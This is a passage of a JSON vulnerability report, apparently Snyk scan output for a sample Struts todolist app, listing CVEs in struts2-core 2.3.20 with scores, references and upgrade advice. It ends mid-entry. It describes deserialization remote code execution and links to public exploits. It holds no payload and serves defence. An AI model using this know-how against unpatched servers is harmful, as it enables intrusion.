"SNYK-JAVA-ORGAPACHESTRUTS-30774", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-038.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:09.208211Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", + "epssDetails": { + "percentile": "0.75315", + "probability": "0.00450", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4430" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.364000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:00:37Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:00:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.023333Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-040.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.211840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", + "epssDetails": { + "percentile": "0.83001", + "probability": "0.00914", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4431" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.377000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T04:49:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T04:49:27Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.000380Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.390000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "credit": [ + "LGTM Security Team" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.13)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", + "title": "Apache Security Bulletin" + }, + { + "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", + "title": "Apache Struts Statement on Equifax Security Breach" + }, + { + "url": "https://www.exploit-db.com/exploits/42627", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", + "title": "LGTM Advisory" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", + "title": "LGTM Vulnerability Details" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:15.532569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", + "epssDetails": { + "percentile": "0.99995", + "probability": "0.97541", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9805" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.345481Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Yasser Zamani" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.33)", + "[2.5,2.5.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.33", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-049.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:16.872773Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", + "epssDetails": { + "percentile": "0.91602", + "probability": "0.03467", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9787" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-07-13T15:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.213194Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Adam Cazzolla", + "Jonathan Bullock" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-050.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:13.755151Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", + "epssDetails": { + "percentile": "0.90011", + "probability": "0.02403", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9804" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:48.540352Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Huijun Chen", + "Xiaolong Zhu" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-051.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:13.751396Z" + }, + { + "type": "secondary", + "vector": 